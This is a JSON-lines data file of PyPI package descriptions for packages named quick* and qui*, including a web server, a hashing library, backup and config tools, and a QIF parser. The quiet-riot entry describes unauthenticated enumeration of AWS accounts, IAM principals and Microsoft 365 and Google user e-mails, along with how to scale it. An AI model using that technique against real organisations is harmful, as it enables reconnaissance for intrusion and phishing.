Quickviz provides a set of\nwidgets to do this in a few clicks."} +{"package": "quickweb", "pacakge-description": "QuickWebQuickWeb is a Python Web Application Server based on the production-provedCherryPyWeb Framework extended with developer friendly features.FeaturesDevelopmentCustom static content folders (any folder containing a.staticfile)Automatic path based routing for templates and controllers, e.g.:/about.html is available as /about/submit.py is available as /submitZero code Jinja2 template rendering for .html files, that can:Use data from YAML files (name.html < name.yaml)Use HTTP specific data e.g.{{session}}Zero code Markdown files renderingLow code Python controllersIntegrated HTTP functional TestingReload on code changesProductionSSLsupportMutual TLSsupportInstallingQuickWeb requires Python3.6+ and can run on Windows, Linux or Mac.Install quickweb using pip:pipinstallquickwebIf the installation is succesful thequickwebcommand will be available, it will allow you to manage quickweb applications from the command line.Getting StartedCreating your first applicationCreate your first quickweb app using a bootstrap based template:quickwebcreatemy-web-appbootstrap-navbar-fixed-topYou will get amy-web-appdirectory containing a quickweb sample app using theBootstraplibrary.Changing the application contentCheck the application directory using your preferred HTML/CSS/JavaScript editor/IDE, edit the the content from thewebrootdirectory as needed.Starting the applicationAfter making some changes and you can test the application executing:quickwebrunmy-web-appA web server is started using port 8080 on your local system. You can check your application by browsing tohttp://localhost:8080. If you later change some of the YAML/HTML/CSS/JS, you can check the changes by refreshing the corresponding page on your browser.Deploying to a cloud platformWhen your application is ready for public access you can deploy it to a cloud platform, it has been tested with the following providers:Heroku Cloud Application Platform (deploy with: git push heroku master)IBM Bluemix (deploy with: cf push appname)Other CloudFoundry based provider (deploy with: cf push appname)It should be able to run from otherCloud Foundrybased providers.NOTES:Check the cloud provider documentation for the web app detailed setup instructionsUse the instructions for python web applications setup/deploymentThe level of support for python based apps will depend on your provider, check it's documentation for detailsContributingCheck theContributing Guide.Maintained ByJo\u00e3o Pinto for theOpen Pipeinitiative"} +{"package": "quick-xinput", "pacakge-description": "Quick XinputDoes it drive you mad when you're living that keyboard-driven terminal lifestyle\nand your wrist grazes the touchpad sending you off to a different window or\ndesktop?If so,quick_xinputis the Python module you need in your life. Bring up a\nquick selector in the terminal,fzf, or with a GUI,rofiand select an\nxinput device to toggle on/off.Usage# toggle a device using fzfpython-mquick_xinput# toggle a device using rofipython-mquick_xinput--rofi# disable a device with rofi (good for keybindings)python-mquick_xinputoff--rofiSource of TruthThis project is available onGitHubandGitLab. 
Each push tomasterautomatically goes to both so choose whichever platform you prefer."} +{"package": "quickxorhash", "pacakge-description": "This python library is a Cython wrapper for the [original C implementation](https://https://github.com/flowerysong/quickxorhash).\nquickxorhash is a C library (libqxh) implementing Microsoft\u2019s QuickXORHash algorithm.## AlgorithmQuickXORHash is a non-cryptographic hash function that XORs the input\nbytes in a circular shift pattern, then XORs the least significant\nbits of the hash with the input length. The canonical representation\nof the resulting hash is a Base64 encoded string, because hexadecimal\nis too plebeian.## Usage`python >>> import quickxorhash >>> h = quickxorhash.quickxorhash() >>> h.update(b'hello world') >>>print(h.digest())b'h(\\x03\\x1b\\xd8\\xf0\\x06\\x10\\xdc\\xe1\\rrk\\x03\\x19\\x00\\x00\\x00\\x00\\x00'>>> import base64 >>>print(base64.b64encode(h.digest()))b'aCgDG9jwBhDc4Q1yawMZAAAAAAA=' `"} +{"package": "quicky-repo", "pacakge-description": "Fast Repo\u26a1 Initialize your projects as fast as you want. \u26a1\ud83c\udfb2 PrerequisitesTo run this project you will need to havePythonandNode.Node Version Managers:fnm,nvm,asdf...Python Version Managers:pyenv,virtualenv...\u2b07\ufe0f How to install and use itgitclonehttps://github.com/kauefraga/fast-repo.gitcdfast-repo\n\npipinstall-rrequirements.txt# Has nothing to try out now...You are welcome to open issues and pull requests!\ud83d\udee0 TechnologiesThe following tools have been used to build the project:\ud83d\udc0dPython- A programming language that lets you work quickly\nand integrate systems more effectively.\ud83d\udd76Click- Composable command line interface toolkit\ud83c\udfa8Rich- Rich is a Python library for rich text and beautiful formatting in the terminal.\ud83d\udcdd LicenseThis project is licensed under the MIT License - See theLICENSEfor more information."} +{"package": "quick-zip", "pacakge-description": "About the ProjectDocumentationWhat QuickZip IsQuickZip is a CLI utility I developed to solve a backup problem on my machines. I wanted a way to quickly backup up small sets of configuration files and data without deploying a massive, hard to maintain tool with too much front-end configuration. QuickZip uses a config.toml file to build tiny list of backups that are conducted when called (typically via cron).Key FeaturesCreate jobs with configuration file, including support for variables and defaultsBeautiful CLIBackup AuditsWebhook Support$quick-zip--helpUsage: qz [OPTIONS] COMMAND [ARGS]...Options:--verbose / --no-verbose [default: False]--install-completion [bash|zsh|fish|powershell|pwsh]Install completion for the specified shell.--show-completion [bash|zsh|fish|powershell|pwsh]Show completion for the specified shell, tocopy it or customize the installation.--help Show this message and exit.Commands:audit \ud83e\uddd0 Performs ONLY the audits for configured jobsconfig \ud83d\udcc4 displays the configuration filedocs \ud83d\udcac Opens quickZip documentation in browserjobsrun \u2728 The main entrypoint for the application.What QuickZip Isn'tQuickZip is NOT a replacement for a robust backup or imaging software. 
It's primary use case is to collect configuration files on system other similar types of files, zip them up, and stick them somewhere else on your file system.Why notx???I can't comment on every backup utility but I can mention the few that I looked at.Borgwas a strong contender and I will likely use it for other things down the line, however I felt like there was too much upfront configuration before being able to use.Rsync/Rclonewere both great options but I felt there were too confusing/robust for what I was trying to do. On top of that, I was looking for a few features that I hadn't seen.Backup Audits: The ability to \"audit\" backups and specify how old the newest backup should beWebhook Support: Send backup data to Home Assistant for notifications and dashboards.Also, I just like building stuff. \ud83d\udc4d"} +{"package": "quickzoom", "pacakge-description": "quickzoomquickzoom is a python command line tool that enables you easy connecting to zoom roomsFree software: MIT licenseFeaturesAfter pip install you can use the following commands in the command linequickzoom Will search your config file for the room label. If the room label exists. Tt willl grabd the meeting id and password and connect to zoom.quickzoom \u2013newroom / -nWill create a new room in your config. Will prompt you for room label, meeting id, meeting password.All your rooms will be saved in your homedirectory/.quickzoom/rooms.json:windows: C:/Users/User/.quickzoom/rooms.jsonOf course you can also manually edit the rooms.json file and quickly paste in some zoom rooms.ToDoimplement connect.get_zoom_exe() for macOs and linuximplement connect.connect_to_meeting() for macOs and linuxCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.2.1 (2020-11-19)First release on PyPI.newroom flag: user will be prompted for room lable, meeting id, room password. Will be saved in config file.raise error if on macOs or linux"} +{"package": "quicli", "pacakge-description": "A wrapper around Python\u2019s argparse module. Provides argparsefunctionality in a simpler, easier-to-use interface, driven by function\nmetadata and decorators, with data validation.For usage, visithttp://dev.kylealanhale.com/wiki/projects/quicli"} +{"package": "quicly", "pacakge-description": "No description available on PyPI."} +{"package": "quicly-mongo", "pacakge-description": "No description available on PyPI."} +{"package": "quicly-redis", "pacakge-description": "No description available on PyPI."} +{"package": "quico", "pacakge-description": "QuicoQuico ou quick-container est un raccourci pour docker. Il permet de compiler et lancer rapidement un conteneur.Environnement requispython 3Installation$./install.shUtilisation$quico[-h]-tTAG[-nNETWORK][-fFILE][-pPUBLISH][-vVOLUME]directory\n\nQuicoouquick-containerpermetdecompilerpuislancerrapidementun\nconteneurdocker.\n\npositionalarguments:directoryDossieroucompilerl'imagedocker.\n\noptionalarguments:-h,--helpshowthishelpmessageandexit-tTAG,--tagTAG-nNETWORK,--networkNETWORKR\u00e9seauoulancerleconteneurdocker-fFILE,--fileFILECheminversleDockerfile\u00e0compiler-pPUBLISH,--publishPUBLISH-vVOLUME,--volumeVOLUME"} +{"package": "quico-pkg-johannhospice", "pacakge-description": "QuicoQuico ou quick-container est un raccourci pour docker. 
Il permet de compiler et lancer rapidement un conteneur.Environnement requispython 3Installation$./install.shUtilisation$quico[-h]-tTAG[-nNETWORK][-fFILE][-pPUBLISH][-vVOLUME]directory\n\nQuicoouquick-containerpermetdecompilerpuislancerrapidementun\nconteneurdocker.\n\npositionalarguments:directoryDossieroucompilerl'imagedocker.\n\noptionalarguments:-h,--helpshowthishelpmessageandexit-tTAG,--tagTAG-nNETWORK,--networkNETWORKR\u00e9seauoulancerleconteneurdocker-fFILE,--fileFILECheminversleDockerfile\u00e0compiler-pPUBLISH,--publishPUBLISH-vVOLUME,--volumeVOLUME"} +{"package": "quic-qpack", "pacakge-description": "No description available on PyPI."} +{"package": "quict", "pacakge-description": "No description available on PyPI."} +{"package": "quict-ml", "pacakge-description": "No description available on PyPI."} +{"package": "quict-sim", "pacakge-description": "No description available on PyPI."} +{"package": "quic-version-detector", "pacakge-description": "This is a small tool that queries QUIC servers for their supported versions.It\u2019s implemented in python3.InstallationGlobal:$ pip install quic-version-detectorOr inside virtual environment:$ virtualenv --python=python3 pyenv\n$ pyenv/bin/pip install quic-version-detector"} +{"package": "quidam", "pacakge-description": "No description available on PyPI."} +{"package": "quidax-python", "pacakge-description": "quidax-pythonPython plugin forQuidaxView onpypi.python.orgInstallationpipinstallquidax-pythonInstantiate Quidaxfromquidaxapi.quidaximportQuidaxquidax_secret_key=\"5om3secretK3y\"quidax=Quidax(secret_key=quidax_secret_key)# to use users classquidax.users.all_sub_account()# to list all marketsquidax.markets.list_all_markets()# to fetch user tradesquidax.trades.trades(user_id)# to fetch wallets from a user and a specific wallet.quidax.wallets.fetch_a_specific_currency_wallet(user_id,currency)DOC Reference:https://developer.quidax.com/Other methods can be found in the docs folderAvailable resourcesUsersOrdersInstantOrdersMarketsWalletsWithdrawalDepositsTradesQuotesPlease reference thedocsfolder for usage,This repo won't be possible without the hard work ofandela-sjames."} +{"package": "quidditas", "pacakge-description": "Installationpip install quidditasFrom sourceUse the setup.py to create a bdist or sdist you can install with pip.Directory layoutquidditas - Quidditas source file and tests\nexamples - Contains small example games using pygame and quidditasUsageTo import and instantiate quidditas:from quidditas import Quidditas, Processor\n\nq = Quidditas()Further informationSee the quidditas homepage for more help athttp://quidditas.googlecode.com/"} +{"package": "quiele", "pacakge-description": "Quiele0.0.2InstallpipinstallquieleFeaturesPrint with color tagsThere are three modes each with it's own colorUsagefromquieleimportinkink(50,mode=\"Metric\")"} +{"package": "quienesquien", "pacakge-description": "quienesquien-pythonCliente para el servicio de listas de QuienesquienRequerimientosPython v3 o superior"} +{"package": "quiet", "pacakge-description": "UNKNOWN"} +{"package": "quietex", "pacakge-description": "QuieTeXMake your LaTeX build output just show the important stuff (seeherefor before and after screen recordings):QuieTeX is a minimal command-line tool which filters and colourizes the output ofpdflatexin real-time.It is not a build tool, it does not do any clever summaries, it just makes it easier to read.FeaturesHides open/close file loggingColours errors redColours warnings yellowTeX input prompt works 
inerrorstopmodeandscrollmodelatexmkintegrationUsageTo install:pip3installquietexTo use:quietexpdflatextest.texTo use withlatexmk, add this to yourlatexmkrc:# Make output prettiereval`quietex --latexmkrc`;"} +{"package": "quiet.py", "pacakge-description": "quiet.pyPython ctypes bindings for libquiet to transmit data with sound.UsageEncode a message, and then decode itfrom quiet import Encode, Decoder\n\ndef test():\n encoder = Encoder()\n decoder = Decoder()\n\n for chunk in encoder.encode('hello, world'):\n message = decoder.decode(chunk)\n if message is not None:\n print(message)\n\n\ntest()decode messages from recording in realtimeimport sys\nimport pyaudio\nfrom quiet import Encode, Decoder\n\ndef decode():\n if sys.version_info[0] < 3:\n import Queue as queue\n else:\n import queue\n\n FORMAT = pyaudio.paFloat32\n CHANNELS = 1\n RATE = 44100\n CHUNK = 16384 # int(RATE / 100)\n\n p = pyaudio.PyAudio()\n q = queue.Queue()\n\n def callback(in_data, frame_count, time_info, status):\n q.put(in_data)\n return (None, pyaudio.paContinue)\n\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK,\n stream_callback=callback)\n\n count = 0\n with Decoder(profile_name='ultrasonic-experimental') as decoder:\n while True:\n try:\n audio = q.get()\n audio = numpy.fromstring(audio, dtype='float32')\n # audio = audio[::CHANNELS]\n code = decoder.decode(audio)\n if code is not None:\n count += 1\n print(code.tostring().decode('utf-8', 'ignore'))\n except KeyboardInterrupt:\n break\n\n\ndecode()"} +{"package": "quiet-py-wasm", "pacakge-description": "No description available on PyPI."} +{"package": "quiet-riot", "pacakge-description": "Quiet Riot:notes:C'mon, Feel The Noise:notes:An enumeration tool for scalable, unauthenticated validation of AWS principals; including AWS Acccount IDs, root e-mail addresses, users, and roles.Credit:Daniel Grzelak@dagrzfor identifying the technique and Will Bengston@__musclesfor inspiring me to scale it.See the introductory blog posthere.See a defender's perspective blog posthere.Getting Started With Quiet RiotPrerequisitesboto3/botocoreSufficient AWS credentials configured via CLIInstallation:First step is to have sufficient AWS credentials configured via CLI. If you do not have your own AWS acccount or sufficient credentials in an AWS account, Quiet Riot will not work.Create the virtual environment, or you can directly install the quiet_riot pkg using pip.For installing this package you can run the command pip install quiet-riot. After installing the package you can run the command quiet_riot --helpUsage:Arguments for quiet_riot are --scan_type, --threads, --wordlist, --profileYou can provide values for arguments required to run this package. Must require argument is scan_type.for e.g quiet_riot --scan_type 3 --threads 30 --wordlist D:\\path_to_wordlist_file --profile DefaultOr you can use the short form for arguments as well like --s, --t, --w, --p--scan_type, --sWhat type of scan do you want to attempt? Enter the type of scan for example1. AWS Account IDs\n 2. Microsoft 365 Domains\n 3. AWS Services Footprinting\n 4. AWS Root User E-mail Address\n 5. AWS IAM Principals\n 4.1. IAM Roles\n 4.2. IAM Users\n 6. Microsoft 365 Users (e-mails)\n 7. Google Workspace Users (e-mails)--threads, --tFor number of threads you have to provide the number for e.g 23 , 30 90 etc. 
Approximately how many threads do you think you want to run?Hint: 2020 M1 Macbook Air w/ 16 GB RAM optimizes @ around 700 threads from limited testing.--wordlist, --wPath to the world list file which will be required for scan.--profile, --pProvide the name of aws profile configured through cli for e.g Default,DevFeatureploitation LimitsThrottlingAfter performing extensive analysis of scaling methods using the AWS Python (Boto3) SDK, I was able to determine that the bottleneck for scanning (at least for Python and awscli -based tools) is I/O capacity of a single-threaded Python application. After modifying the program to run with multiple threads, I was able to trigger exceptions in individual threads due to throttling by the various AWS APIs. You can see the results from running a few benchmarking test scanshere. APIs that I tested had wildly different throttling limits and notably, s3 bucket policy attempts took ~10x as long as similar attempts against other services.With further testing, I settled on a combination of SNS, ECR-Public, and ECR-Private services running in US-East-1 in ~40%/50%/10% configuration split with ~700 threads. The machine I used was a 2020 Macbook Air (M1 and 16 GB RAM). This configuration yielded on average ~1100 calls/sec, though the actual number of calls can fluctuate significantly depending on a variety of factors including network connectivity. Under these configurations, I did occasionally throw an exception on a thread from throttling...but I have subsequently configured additional re-try attempts (4 -> 7) via botocore that will eliminate this issue with a minor performance trade-off.Computational DifficultyTo attempt every possible Account ID in AWS (1,000,000,000,000) would require an infeasible amount of time given only one account. Even assuming absolute efficiency*, over the course of a day an attacker will only be able to make 95,040,000 validation checks. Over 30 days, this is 2,851,200,000 validation checks and we are still over 28 years away from enumerating every valid AWS Account ID. Fortunately, there is nothing stopping us from registering many AWS accounts and automating this scan. While there is an initial limit of 20 accounts per AWS organization, I was able to get this limit increased for my Organization via console self-service and approval from an AWS representative. The approval occured without any further questions and now I'm off to automating this writ large. 
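For concreteness, the arithmetic behind the figures above can be checked with a few lines of Python. This is just a back-of-the-envelope sketch using the ~1100 calls/second rate quoted earlier; none of it comes from the tool itself.

```python
# Back-of-the-envelope check of the enumeration math quoted above.
calls_per_second = 1100                 # approximate per-account rate from the benchmarks above
checks_per_day = calls_per_second * 60 * 60 * 24
print(checks_per_day)                   # 95,040,000 validation checks per day
print(checks_per_day * 30)              # 2,851,200,000 checks in 30 days

total_account_ids = 10 ** 12            # every possible 12-digit AWS Account ID
days_one_account = total_account_ids / checks_per_day
print(days_one_account / 365)           # ~28.8 years with a single account

accounts = 100                          # roughly the scale implied by the ~100 day estimate below
print(days_one_account / accounts)      # ~105 days when spread across 100 accounts
```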
Again, assuming absolute efficiency, the 28 years of scanning could potentially be reduced down to ~100 days.*

*~1100 API calls/check per second in perpetuity per account and never repeating a guessed Account ID.

Potential Supported Services

| # | AWS Service | Description | API Limits | Resource Pricing | Enumeration Capability |
|---|-------------|-------------|------------|------------------|------------------------|
| 1 | SNS | Managed Serverless Notification Service | Unknown | Unknown | Yes |
| 2 | KMS | Encryption Key Management Service | Unknown | Unknown | Yes |
| 3 | SecretsManager | Managed Secret Store | Unknown | Unknown | Yes |
| 4 | CodeArtifact | Managed Source Code Repository | Unknown | Unknown | Yes |
| 5 | ECR Public | Managed Container Registry | Unknown | Unknown | Yes |
| 6 | ECR Private | Managed Container Registry | Unknown | Unknown | Yes |
| 7 | Lambda | Managed Serverless Function | Unknown | Unknown | Yes |
| 8 | s3 | Managed Serverless Object Store | Unknown | Unknown | Yes |
| 9 | SES | SMTP Automation Service | Unknown | Unknown | Unknown |
| 10 | ACM | Private Certificate Authority | Unknown | Unknown | Unknown |
| 11 | CodeBuild | Software Build Agent | Unknown | Unknown | Unknown |
| 12 | AWS Backup | Managed Backup Service | Unknown | Unknown | Unknown |
| 13 | Cloud9 | Managed IDE | Unknown | Unknown | Unknown |
| 14 | Glue | Managed ETL Job Service | Unknown | Unknown | Unknown |
| 15 | EKS | Managed K8s Service | Unknown | Unknown | Unknown |
| 16 | Lex V2 | Managed NLP Service | Unknown | Unknown | Unknown |
| 17 | CloudWatch Logs | Managed Log Pipeline/Monitoring | Unknown | Unknown | Unknown |
| 18 | VPC Endpoints | Managed Virtual Network | Unknown | Unknown | Unknown |
| 19 | Elemental MediaStore | Unknown | Unknown | Unknown | Unknown |
| 20 | OpenSearch | Managed ElasticSearch | Unknown | Unknown | Unknown |
| 21 | EventBridge | Managed Serverless Event Hub | Unknown | Unknown | Unknown |
| 22 | EventBridge Schemas | Managed Serverless Event Hub | Unknown | Unknown | Unknown |
| 23 | IoT | Internet-of-Things Management | Unknown | Unknown | Unknown |
| 24 | s3 Glacier | Cold Object Storage | Unknown | Unknown | Unknown |
| 25 | ECS | Managed Container Orchestration | Unknown | Unknown | Unknown |
| 26 | Serverless Application Repository | Managed Source Code Repository | Unknown | Unknown | No |
| 27 | SQS | Managed Serverless Queueing Service | Unknown | Unknown | No |
| 28 | EFS | Managed Serverless Elastic File System | Unknown | Unknown | No |
"} +{"package": "quiet-riot-aws", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "quiffen", "pacakge-description": "Quiffen is a Python package for parsing QIF (Quicken Interchange Format) files.The package allows users to both read QIF files and interact with the contents, and also to create a QIF structure\nand then output to either a QIF file, a CSV of transaction data or a pandas DataFrame.QIF is an old file type, but has its merits because:It\u2019s standardised (apart from dates, but that can be dealt with)Unlike CSVs, QIF files all follow the same format, so they don\u2019t require special attention when they come from\ndifferent sourcesIt\u2019s written in plain textFeaturesImport QIF files and manipulate dataCreate QIF structures (support for Transactions, Investments, Accounts, Categories, Classes, Splits)Convert Qif objects to a number of different formats and export (pandas DataFrame, CSV, QIF file)UsageHere\u2019s an example parsing of a QIF file:>>> from quiffen import Qif, QifDataType\n>>> import decimal\n>>> qif = Qif.parse('test.qif', day_first=False)\n>>> qif.accounts\n{'Quiffen Default Account': Account(name='Quiffen Default Account', desc='The default account created by Quiffen when no\nother accounts were present')}\n>>> acc = qif.accounts['Quiffen Default Account']\n>>> acc.transactions\n{'Bank': TransactionList(Transaction(date=datetime.datetime(2021, 2, 14, 0 , 0), amount=decimal.Decimal(150.0), ...), ...),\n'Invst': TransactionList(...)}\n>>> tr = acc.transactions['Bank'][0]\n>>> print(tr)\nTransaction:\n Date: 2020-02-14 00:00:00\n Amount: 67.5\n Payee: T-Mobile\n Category: Cell Phone\n Split Categories: ['Bills']\n Splits: 2 total split(s)\n>>> qif.categories\n{'Bills': Category(name='Bills), expense=True, hierarchy='Bills'}\n>>> bills = qif.categories['Bills']\n>>> print(bills.render_tree())\nBills (root)\n\u2514\u2500 Cell Phone\n>>> df = qif.to_dataframe(data_type=QifDataType.TRANSACTIONS)\n>>> df.head()\n date amount payee ... memo cleared check_number\n0 2020-02-14 67.5 T-Mobile ... NaN NaN NaN\n1 2020-02-14 32.0 US Post Office ... money back for damaged parcel NaN NaN\n2 2020-12-02 -10.0 Target ... two transactions, equal NaN NaN\n3 2020-11-02 -25.0 Walmart ... non split transaction X 123.0\n4 2020-10-02 -100.0 Amazon.com ... 
test order 1 * NaN\n...And here\u2019s an example of creating a QIF structure and exporting to a QIF file:>>> import quiffen\n>>> from datetime import datetime\n>>> qif = quiffen.Qif()\n>>> acc = quiffen.Account(name='Personal Bank Account', desc='My personal bank account with Barclays.')\n>>> qif.add_account(acc)\n>>> groceries = quiffen.Category(name='Groceries')\n>>> essentials = quiffen.Category(name='Essentials')\n>>> groceries.add_child(essentials)\n>>> qif.add_category(groceries)\n>>> tr = quiffen.Transaction(date=datetime.now(), amount=150.0)\n>>> acc.add_transaction(tr, header=quiffen.AccountType.BANK)\n>>> qif.to_qif() # If a path is provided, this will save the file too!\n'!Type:Cat\\nNGroceries\\nETrue\\nIFalse\\n^\\nNGroceries:Essentials\\nETrue\\nIFalse\\n^\\n!Account\\nNPersonal Bank Account\\nDMy\npersonal bank account with Barclays.\\n^\\n!Type:Bank\\nD02/07/2021\\nT150.0\\n^\\n'DocumentationDocumentation can be found at:https://quiffen.readthedocs.io/en/latest/InstallationInstall Quiffen by running:>>> pip install quiffenDependenciespandas(optional) for exporting to DataFramesTheto_dataframe()method will not work without pandas installed.To-DosAdd support for theMemorizedTransactionobject present in QIF files.ContributeGitHub pull requests welcome, though if you want to make a major change, please open an issue first for discussion.Issue Tracker:https://github.com/isaacharrisholt/quiffen/issuesSource Code:https://github.com/isaacharrisholt/quiffenSupportIf you are having issues, please let me know.LicenseThe project is licensed under the GNU GPLv3 license."} +{"package": "quik", "pacakge-description": "A fast and lightweight Python template engineFeaturesEasy to use.High performance.Autoescaping.Template inheritance.Supports native python expressions.NutshellHere a small example of a Quik template
#for @user in @users:
    #if @user.age > 18:
        <li>@user.username</li>
    #end
#end
Use ItRender via template:fromquikimportFileLoaderloader=FileLoader('html')template=loader.load_template('index.html')printtemplate.render({'author':'Thiago Avelino'},loader=loader).encode('utf-8')"} +{"package": "quik-config", "pacakge-description": "What is this?A config system that doesn't waste your timeper-machine settings that stay in synca consistent way to handle filepaths (stop hardcoding filepaths as python strings!)hierarchical, with inheritable groups of settings (profiles)default works along sideargparse, but also can just replace it entirely for rapid developmentall values in the hierarchy can be overridden with CLI argsselect multiple profiles from CLI (ex: GPU & DEV or UNIX & GPU & PROD)can combine/import multiple config filesHow do I use this?pip install quik-configIn aconfig.py:fromquik_configimportfind_and_loadinfo=find_and_load(\"info.yaml\",# walks up folders until it finds a file with this namecd_to_filepath=True,# helpful if using relative pathsfully_parse_args=True,# if you already have argparse, use parse_args=True insteadshow_help_for_no_args=False,# change if you want)print(info.config)# dictionaryCreateinfo.yamlwith a structure like this:# names in parentheses are special, all other names are not!# (e.g. add/extend this with any custom fields)(project):# the local_data file will be auto-generated# (its for machine-specific data)# so probably git-ignore whatever path you pick(local_data):./local_data.ignore.yaml# example profiles(profiles):(default):blah:\"blahblahblah\"mode:development# or production. Same thing reallyhas_gpu:maybeconstants:pi:3# its 'bout 3PROFILE1:constants:e:2.7182818285PROD:mode:productionconstants:pi:3.1415926536problems:trueThen run it:python./config.pyWhich will print out this config:{\"blah\":\"blah blah blah\",# from (default)\"mode\":\"development\",# from (default)\"has_gpu\":\"maybe\",# from (default)\"constants\":{\"pi\":3,# from (default)},}FeaturesBuiltin Helppython./config.py--help--profilesavailable profiles:\n - DEV\n - GPU\n - PROD\n\nas cli argument:\n -- --profiles='[\"DEV\"]'\n -- --profiles='[\"GPU\"]'\n -- --profiles='[\"PROD\"]'---------------------------------------------------------------------------------\n QUIK CONFIG HELP\n ---------------------------------------------------------------------------------\n \n open the file below and look for \"(profiles)\" for more information:\n $PWD/info.yaml\n \n examples:\n python3 ./ur_file.py -- --help --profiles\n python3 ./ur_file.py -- --help key1\n python3 ./ur_file.py -- --help key1:subKey\n python3 ./ur_file.py -- --help key1:subKey key2\n python3 ./ur_file.py -- --profiles='[YOUR_PROFILE, YOUR_OTHER_PROFILE]'\n python3 ./ur_file.py -- thing1:\"Im a new value\" part2:\"10000\"\n python3 ./ur_file.py -- thing1:\"I : cause errors\" part2:10000\n python3 ./ur_file.py -- 'thing1:\"I : dont cause errors\" part2:10000\n python3 ./ur_file.py -- 'thing1:[\"Im in a list\"]'\n python3 ./ur_file.py -- 'thing1:part_A:\"Im nested\"'\n python3 ./ur_file.py \"I get sent to ./ur_file.py\" -- part2:\"new value\"\n python3 ./ur_file.py \"I get ignored\" \"me too\" -- part2:10000\n \n how it works:\n - the \"--\" is a required argument, quik config only looks after the --\n - given \"thing1:10\", \"thing1\" is the key, \"10\" is the value\n - All values are parsed as json/yaml\n - \"true\" is boolean true\n - \"10\" is a number\n - '\"10\"' is a string (JSON escaping)\n - '\"10\\n\"' is a string with a newline\n - '[10,11,hello]' is a list with two numbers and an unquoted string\n - 
'{\"thing\": 10}' is a map/object\n - \"blah blah\" is an un-quoted string with a space. Yes its valid YAML\n - multiline values are valid, you can dump an whole JSON doc as 1 arg\n - \"thing1:10\" overrides the \"thing1\" in the (profiles) of the info.yaml\n - \"thing:subThing:10\" is shorthand, 10 is the value, the others are keys\n it will only override the subThing (and will create it if necessary)\n - '{\"thing\": {\"subThing\":10} }' is long-hand for \"thing:subThing:10\"\n - '\"thing:subThing\":10' will currently not work for shorthand (parse error)\n \n options:\n --help\n --profiles\n \n ---------------------------------------------------------------------------------\n \n your default top-level keys:\n - mode\n - has_gpu\n - constants\n your local defaults file:\n ./local_data.ignore.yaml\n your default profiles:\n - DEV\n \n ---------------------------------------------------------------------------------Select Profiles from CLIpython./config.py@PROFILE1prints:{\"blah\":\"blah blah blah\",# from (default)\"mode\":\"development\",# from (default)\"has_gpu\":\"maybe\",# from (default)\"constants\":{\"pi\":3.1415926536,# from (default)\"e\":2.7182818285,# from PROFILE1},}python./config.py@PROFILE1@PRODprints:{\"blah\":\"blah blah blah\",# from (default)\"mode\":\"production\",# from PROD\"has_gpu\":\"maybe\",# from (default)\"constants\":{\"pi\":3.1415926536,# from (default)\"e\":2.7182818285,# from PROFILE1\"problems\":True,# from PROD},}Override Values from CLIpython./config.py@PROFILE1mode:customconstants:problems:99prints:{\"blah\":\"blah blah blah\",# from (default)\"mode\":\"custom\",# from CLI\"has_gpu\":\"maybe\",# from (default)\"constants\":{\"pi\":3.1415926536,# from (default)\"e\":2.7182818285,# from PROFILE1\"problems\":99,# from CLI},}Again but with really complicated arguments:(each argument is parsed as yaml)python./run.pyarg1--mode:my_custom_mode'constants: { tau: 6.2831853072, pi: 3.1415926, reserved_letters: [ \"C\", \"K\", \"i\" ] }'prints:config:{\"mode\":\"my_custom_mode\",\"has_gpu\":False,\"constants\":{\"pi\":3.1415926,\"tau\":6.2831853072,\"reserved_letters\":[\"C\",\"K\",\"i\",],},}unused_args:[\"arg1\"]Working Alongside Argparse (quick)Removefully_parse_argsand replace it with justparse_argsinfo=find_and_load(\"info.yaml\",parse_args=True,# <- will only parse after --)Everthing in the CLI is the same, but it waits for--For example:# quik_config ignores arg1 --arg2 arg3, so argparse can do its thing with thempython./config.pyarg1--arg2arg3--@PRODWorking Alongside Argparse (advanced)Arguments can simply be passed as a list of strings, which can be useful for running many combinations of configs.info=find_and_load(\"info.yaml\",args=[\"@PROD\"],)Relative and absolute pathsAdd them to the info.yaml(project):(local_data):./local_data.ignore.yaml# filepaths (relative to location of info.yaml)(path_to):this_file:\"./info.yaml\"blah_file:\"./data/results.txt\"# example profiles(profiles):(default):blah:\"blahblahblah\"Access them in pythoninfo=find_and_load(\"info.yaml\")info.path_to.blah_fileinfo.absolute_path_to.blah_file# nice when then PWD != folder of the info fileImport other yaml filesFIXMEDifferent Profiles For Different MachinesLets say you've several machines and an info.yaml like this:(project):(profiles):DEV:cores:1database_ip:192.168.10.10mode:devLAPTOP:cores:2DESKTOP:cores:8UNIX:line_endings:\"\\n\"WINDOWS:line_endings:\"\\r\\n\"PROD:database_ip:183.177.10.83mode:prodcores:32And lets say you have aconfig.pylike 
this:fromquik_configimportfind_and_loadinfo=find_and_load(\"info.yaml\",defaults_for_local_data=[\"DEV\",],# if the ./local_data.ignore.yaml doesnt exist,# => create it and add DEV as the default no-argument choice)Run the code once to get a./local_data.ignore.yamlfile.Each machine gets to pick the profiles it defaults to.So, on your Macbook you can edit the./local_data.ignore.yamlto include something like the following:(selected_profiles):-LAPTOP# the cores:2 will be used (instead of cores:1 from DEV)-UNIX# because LAPTOP is higher in the list than DEV-DEVOn your Windows laptop you can edit it and put:(selected_profiles):-LAPTOP-WINDOWS-DEVCommand Line ArgumentsIf you haverun.pylike this:fromquik_configimportfind_and_loadinfo=find_and_load(\"info.yaml\",parse_args=True)print(\"config:\",info.config)print(\"unused_args:\",info.unused_args)## call some other function you've got##from your_code import run#run(*info.unused_args)Example 0Using the python file and config file abovepython./run.pyRunning that will output:config:{\"mode\":\"development\",\"has_gpu\":False,\"constants\":{\"pi\":3}}unused_args:[]Example 1Show help. This output can be overridden in the info.yaml by setting(help):under the(project):key.python./run.py----helpNote the--is needed in front of the help.You can also addshow_help_for_no_args=Trueif you want that behavior.Ex:fromquik_configimportfind_and_loadinfo=find_and_load(\"info.yaml\",show_help_for_no_args=Trueparse_args=True,)Example 2Again but selecting some profilespython./run.pyarg1----profiles='[PROD]'# orpython./run.pyarg1--@PRODOutput:config:{\"mode\":\"production\",\"has_gpu\":False,\"constants\":{\"pi\":3.1415926536,\"problems\":True,},}unused_args:[\"arg1\"]Example 3Again but with custom arguments:python./run.pyarg1--mode:my_custom_modeconstants:tau:6.2831853072config:{\"mode\":\"my_custom_mode\",\"has_gpu\":False,\"constants\":{\"pi\":3,\"tau\":6.2831853072,},}unused_args:[\"arg1\"]Example 4Again but with really complicated arguments:(each argument is parsed as 